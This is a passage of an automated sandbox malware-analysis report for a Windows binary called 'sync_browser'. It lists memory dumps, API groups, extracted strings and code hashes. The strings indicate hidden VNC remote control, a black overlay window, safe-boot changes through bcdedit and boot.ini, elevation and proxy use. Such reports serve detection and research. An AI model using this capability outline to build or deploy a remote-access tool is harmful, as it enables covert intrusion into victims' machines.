                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFindMode$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2885216544-0
                                                                    • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                    • Instruction ID: d5bda9aa6e4da9f060c0c22ca547c156e251bde1644f85fa07c70f049adb72d6
                                                                    • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                    • Instruction Fuzzy Hash: D5011235B0878586EA248F21B9542AD63A5FB4CBE0F404235EE6D83794CE3DD9568B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                                    • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                                    • API String ID: 1650122287-1031704962
                                                                    • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                    • Instruction ID: f254d2e214ec8687cfb61e331d9fdc6a793ba38fde2aa7d394e57c0999f0b1a3
                                                                    • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                    • Instruction Fuzzy Hash: A3814235908B9A81EB15DF20E8543EC33A4FB58B98F444136DE6E8B294DF7CD666C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                                    • String ID: F
                                                                    • API String ID: 2202639625-1304234792
                                                                    • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                    • Instruction ID: 367969f5ef3e0d74f360decd1e5db20fd7a919b38bc2727c6e3d0e362ba857a2
                                                                    • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                    • Instruction Fuzzy Hash: 66C16E36A046AA8AE790CF65D648AAE73BDFF48B44F010437EE0D93704DF789856CB14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
                                                                    • String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
                                                                    • API String ID: 1337014749-2363801694
                                                                    • Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                    • Instruction ID: cec893343ba3f31c9863cb9eebf21cc369c3b13bf79d7fac92f91adead08f4e1
                                                                    • Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                    • Instruction Fuzzy Hash: 3071E936A08B9686E714CF25F85476E73A8FB89B54F10413ADA6E83794DF3CD466CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
                                                                    • String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
                                                                    • API String ID: 3746257916-1709497384
                                                                    • Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                    • Instruction ID: f2098a90b7ff64254fe44a9ff45147915f95364575b5ad9a003aec0ab58af799
                                                                    • Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                    • Instruction Fuzzy Hash: 4D710E35A15A9A99E7108F64EC406ED33A4FB48368F405337EA7D86AD4DF3CD22AC740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
                                                                    • API String ID: 3609861302-2295524587
                                                                    • Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                    • Instruction ID: 2c8f633cae724a00b9d55bfe053dd6f51cfa76626bbaaa45fbacf8bb84ec5c4e
                                                                    • Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                    • Instruction Fuzzy Hash: 7BA1BF21E0969A85FE65DB24DA503BC2294AF40784F480537DA0DC77E1EF2EEA37C350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
                                                                    • String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
                                                                    • API String ID: 421987145-2663527212
                                                                    • Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                    • Instruction ID: a9f2737bdda94650a3997199c409100169d1e4ab62d5acfa6e17e392bb564fd3
                                                                    • Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                    • Instruction Fuzzy Hash: A5A13971A58A8B81EB509F61E8542FD2368EF88B44F584133D90EC7295DF3EE56BC350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
                                                                    • String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
                                                                    • API String ID: 3443580464-3826360582
                                                                    • Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                    • Instruction ID: b8ea9db550e9a949c8a33cf7f912d23fb972390e6e45e70804503809c58f24dd
                                                                    • Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                    • Instruction Fuzzy Hash: CC612035A15A9A99E710CF64EC406ED33A4FB48358F401337EA6D86AD4DF3CD22AC740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
                                                                    • String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
                                                                    • API String ID: 3955186772-955988753
                                                                    • Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                    • Instruction ID: 420225904e257fa05fe9981caa78fdcf924cde6a04b80b7691d31344b217187f
                                                                    • Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                    • Instruction Fuzzy Hash: CEB1EE21A0CB8A81EB10CB25EA403BD63A5EB85794F508232EA5D87AC5DF3DD12BC750
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
                                                                    • String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
                                                                    • API String ID: 3199031719-36275550
                                                                    • Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                    • Instruction ID: 3b7ac17374607436c7a5c84f6236ed99b6dea17527140a78cbf5da35e13ddffd
                                                                    • Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                    • Instruction Fuzzy Hash: 6C516F21B0975A86EA54EF21E8442BD63A8FF88B85F444136DA4DC77A5DF3CE16BC700
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
                                                                    • String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
                                                                    • API String ID: 55935355-432259686
                                                                    • Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                    • Instruction ID: f3c901e317f5ea520618ae3bffa5c057a456466fb336e8d607aaf990982c823c
                                                                    • Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                    • Instruction Fuzzy Hash: D3517124A1CBAB91FB24DB61AC556FD63A9AF85744F604133C94EC2664EF3DE12BC700
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                                    • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                                    • API String ID: 3943905059-2958163836
                                                                    • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                    • Instruction ID: 8b3fd3cba1601970f1a261753eec0362deb5879d79b77d84d6d7b8eff21f8a51
                                                                    • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                    • Instruction Fuzzy Hash: 42413D71A18ACA86EB149B21E8047EE636DFB84744F840133CA4DD72A9DF3DE16BC350
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteIconInfoObject
                                                                    • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                                    • API String ID: 2689914137-3853778978
                                                                    • Opcode ID: 2f8f0d1229a19f6cc99125dd6f7866c1e440804fb71aa97e513b1dd5eb10ea0b
                                                                    • Instruction ID: a75444b850cf97295df5471788b7e4602aeb9f86cffd8a869f36c206cbe71ed5
                                                                    • Opcode Fuzzy Hash: 2f8f0d1229a19f6cc99125dd6f7866c1e440804fb71aa97e513b1dd5eb10ea0b
                                                                    • Instruction Fuzzy Hash: 63918171A0868A89EB60DF61D8413BD63A8FB84B88F404532DE4DC7A95DF3DE5A7C700
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Lock$AllocFreemalloc
                                                                    • String ID: Unable to allocate memory in zip dll
                                                                    • API String ID: 105282483-1808592719
                                                                    • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                    • Instruction ID: bb2a3ab21f45a1d89a79cb6697ffafb2e6f926001a48609dee63b65ece5e2882
                                                                    • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                    • Instruction Fuzzy Hash: 9A713A26A09B5A86EB45CF65E8902BC23A8FF44B98F044136CE5E87395DF3CE567C310
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 1145045407-2988720461
                                                                    • Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                    • Instruction ID: 32a991961fbfbf456ddf62bf8d37b660f2d3d8ea13a0fdcabe50e90eb4b5f6b0
                                                                    • Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                    • Instruction Fuzzy Hash: 6061A332A0878686EB109F20D8403AD37A4FF847A8F448136EA5D87F99DF3DE566C740
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$Openlstrlenmalloc
                                                                    • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                                    • API String ID: 1137168859-3840687832
                                                                    • Opcode ID: c3e5059f5506e50aa49e87f738da84c728db6ecd1ac36e58f4a7c2abc53800e9
                                                                    • Instruction ID: a49e81583a5ddfea236112d94d14ae53dae8e2b0cdaef7bfd135f830d983248c
                                                                    • Opcode Fuzzy Hash: c3e5059f5506e50aa49e87f738da84c728db6ecd1ac36e58f4a7c2abc53800e9
                                                                    • Instruction Fuzzy Hash: 2A417071A0C66B81FB208B66E94067D77A8EF857D4F444133E94DC2AA5DF2CE167CB10
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                    • String ID: .$:.
                                                                    • API String ID: 2522281643-2811378331
                                                                    • Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                    • Instruction ID: df260cf71741909fbf41ee012da677bdd72f2602b2ebef547d4db48e87a85a7b
                                                                    • Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                    • Instruction Fuzzy Hash: 8C31A613E0C2AA92FB615F609C01BBE2698AF45740F784037EA4CC66C6DE7CE863C751
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
